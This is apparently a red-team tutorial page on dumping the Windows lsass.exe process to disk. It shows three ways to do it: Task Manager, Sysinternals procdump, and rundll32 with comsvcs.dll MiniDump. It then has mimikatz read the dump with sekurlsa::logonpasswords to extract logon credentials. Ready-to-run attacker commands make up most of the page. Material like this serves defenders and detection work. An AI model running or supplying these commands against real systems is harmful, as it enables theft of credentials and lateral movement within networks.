Skip to content

Latest commit

 

History

History
52 lines (32 loc) · 1.31 KB

dump-credentials-from-lsass-process-without-mimikatz.md

File metadata and controls

52 lines (32 loc) · 1.31 KB

Dumping Lsass.exe to Disk Without Mimikatz and Extracting Credentials

Task Manager

Create a minidump of the lsass.exe using task manager (must be running as administrator):

Swtich mimikatz context to the minidump:

{% code title="attacker@mimikatz" %}

sekurlsa::minidump C:\Users\ADMINI~1.OFF\AppData\Local\Temp\lsass.DMP
sekurlsa::logonpasswords

{% endcode %}

Procdump

Procdump from sysinternal's could also be used to dump the process:

{% code title="attacker@victim" %}

procdump.exe -accepteula -ma lsass.exe lsass.dmp

// or avoid reading lsass by dumping a cloned lsass process
procdump.exe -accepteula -r -ma lsass.exe lsass.dmp

{% endcode %}

comsvcs.dll

Executing a native comsvcs.dll DLL found in Windows\system32 with rundll32:

.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full

References

{% embed url="https://t.co/s2VePo3ICo?amp=1" %}